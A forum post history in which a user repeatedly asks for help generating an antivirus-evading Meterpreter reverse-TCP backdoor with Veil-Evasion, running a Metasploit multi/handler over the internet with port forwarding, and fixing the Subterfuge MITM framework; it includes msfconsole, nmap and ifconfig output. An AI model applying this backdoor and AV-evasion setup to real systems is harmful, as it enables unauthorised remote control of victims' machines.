Caps
-
Posts
12 -
Joined
-
Last visited
Posts posted by Caps
-
-
Hello ,
I cant make a backdoor that works with a dns , I want to use Veil to bypass the AV but it does not work .
What I use in Veil :
- I use python/shellcode_inject/base64_substitution
- For payload windows/meterpreter/reverse_tcp_dns
Veil asks me 2 times for a lhost .
What I use in Metasploit :
- multi/handler
- payload is windows/meterpreter/reverse_tcp_dns
- lhost is my local ip
- lport is my port
It works witout a dns.
Please help .
-
Hello ,
I cant make a backdoor that works with a dns , I want to use Veil to bypass the AV but it does not work .
What I use in Veil :
- I use python/shellcode_inject/base64_substitution
- For payload windows/meterpreter/reverse_tcp_dns
Veil asks me 2 times for a lhost .
What I use in Metasploit :
- multi/handler
- payload is windows/meterpreter/reverse_tcp_dns
- lhost is my local ip
- lport is my port
It works witout a dns.
Please help .
-
Yes I use reverse tcp, and it works when I use an online scanner so I have to check on my backdoor .
-
Nice now its working over lan, I want to try it over internet still the same problem.
For the configs of my backdoor and listener see above it is still the same but I will recap it :
Backdoor
lhost : my external ip
lport : 4444
Listener
lhost : my internal ip
lport : 4444
The port is open on my router , checked with an online checker .
-
Thanks for the help it works now!
-
So I did some nc I my listener is woking when I do a nc on my pc on my listener I get sending stage , how do I test it from my windows pc ?
I think that my pc blocks connections from outside.
EDIT:
I installed netcat on my windows when I try to do it I don't get any connections.
-
There are no sessions when I try to connect and when I do jobs there is a jobs multi/handler
I am trying to fix my problem that I can use my backdoor over lan , any ideas?
-
So I think I got the port forward to work but I can't get a session , even when I try just a local backdoor with the lhost on the backdoor set to my local ip it will not work .
-
Well, all I can tell you is that based on your screenshot is that with this configuration in place if something on the internet wants to connect to you on port 4444 that will now work.
If you have a backdoor on a remote machine, you probably only need to connect to it as it's listening on a port for you - this whole port mapping thing shouldn't even be required. Unless, in the process of breaking into a remote host you run shellcode on the remote host that results in it connecting back to you.
That really is all I can tell you. To make it a car analogy, you're asking me if a close-up photograph of a chunk of asphalt is a part of the road between New York and Las Vegas. It could be, but without a bit more info it's impossible to tell.
Ok I will try to give you as many info as I can .
I run kali linux 2 on my laptop ThinkPas Edge , it is not a vm.
I am wireless connected to my router bbox 3 .
Here are my commands for my terminal listener :
root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
[-] WARNING! The following modules could not be loaded!
[-] /usr/share/metasploit-framework/modules/exploits/windows/25912.rb: SyntaxError /usr/share/metasploit-framework/modules/exploits/windows/25912.rb:30: syntax error, unexpected tCONSTANT, expecting end-of-input
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
^
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.4-2015071403 ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.44
lhost => 192.168.1.44
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.1.44 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.44:4444
[*] Starting the payload handler...
msf exploit(handler) >
I use veil-evasion for my backdoor .
The encoder I use :
35) python/shellcode_inject/base64_substitution
Shell code is msfvenom, payload is windows/meterpreter/reverse_tcp
LHOST: my external ip
LPORT: 4444
no extra msfvenom options
thats my backdoor.
I also did some nmaps:
on my local ip :
root@kali:~# nmap 192.168.1.44 -p 4444
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 12:58 BST
Nmap scan report for kali (192.168.1.44)
Host is up (0.00013s latency).
PORT STATE SERVICE
4444/tcp open krb524
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
on my router gateway:
root@kali:~# nmap 192.168.1.1 -p 4444
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 12:59 BST
Nmap scan report for mymodem (192.168.1.1)
Host is up (0.0032s latency).
PORT STATE SERVICE
4444/tcp closed krb524
MAC Address: 68:15:90:0C:2E:01 (Sagemcom SAS)
Nmap done: 1 IP address (1 host up) scanned in 0.64 seconds
and on my public ip:
root@kali:~# nmap public ip -p 4444
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-30 13:00 BST
Nmap scan report for x.x.x.x.belgacom.be (public ip)
Host is up (0.0065s latency).
PORT STATE SERVICE
4444/tcp filtered krb524
Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds
Here is my ifconfig on wlan:
root@kali:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 74:e5:0b:0b:f6:a4
inet addr:192.168.1.44 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: 2a02:a03f:2c0a:e400:76e5:bff:fe0b:f6a4/64 Scope:Global
inet6 addr: fe80::76e5:bff:fe0b:f6a4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:617656 errors:0 dropped:0 overruns:0 frame:0
TX packets:283680 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:546610500 (521.2 MiB) TX bytes:43580129 (41.5 MiB)
I think I gave you all I can, It says that I can't post until tomorow.
-
Please Help me , I am still here .
-
Hello , I am new to this forum but I think you guys can help me.
I am having trouble with metasploit over the intenet .
I have a backdoor with lhost: external ip and lport: 4444
My listener is just multi/handler with lhost: local ip and lport: 4444
I portforwarded the port 4444 on my router to my local ip .
To make my backdoor I use veil.
Hop you can help me !!!
Kail Linux 2.0 : Need help with subterfuge
in Hacks & Mods
Posted
Hello,
I want to use subterfuge but I am getting an error , please help me:
Traceback (most recent call last):
File "/bin/subterfuge", line 7, in <module>
from update import updatecheck
File "/usr/share/subterfuge/update.py", line 24, in <module>
for settings in setup.objects.all():
File "/usr/lib/python2.7/dist-packages/django/db/models/query.py", line 141, in __iter__
self._fetch_all()
File "/usr/lib/python2.7/dist-packages/django/db/models/query.py", line 966, in _fetch_all
self._result_cache = list(self.iterator())
File "/usr/lib/python2.7/dist-packages/django/db/models/query.py", line 265, in iterator
for row in compiler.results_iter():
File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 700, in results_iter
for rows in self.execute_sql(MULTI):
File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 775, in execute_sql
sql, params = self.as_sql()
File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 100, in as_sql
out_cols, s_params = self.get_columns(with_col_aliases)
File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 246, in get_columns
col_aliases)
File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 328, in get_default_columns
r = '%s.%s' % (qn(alias), qn2(column))
File "/usr/lib/python2.7/dist-packages/django/db/models/sql/compiler.py", line 62, in __call__
r = self.connection.ops.quote_name(name)
File "/usr/lib/python2.7/dist-packages/django/db/backends/dummy/base.py", line 18, in complain
raise ImproperlyConfigured("settings.DATABASES is improperly configured. "
django.core.exceptions.ImproperlyConfigured: settings.DATABASES is improperly configured. Please supply the ENGINE value. Check settings documentation for more details.
I followd the instructions on the git site : https://github.com/Subterfuge-Framework/Subterfuge
Please send help , Caps....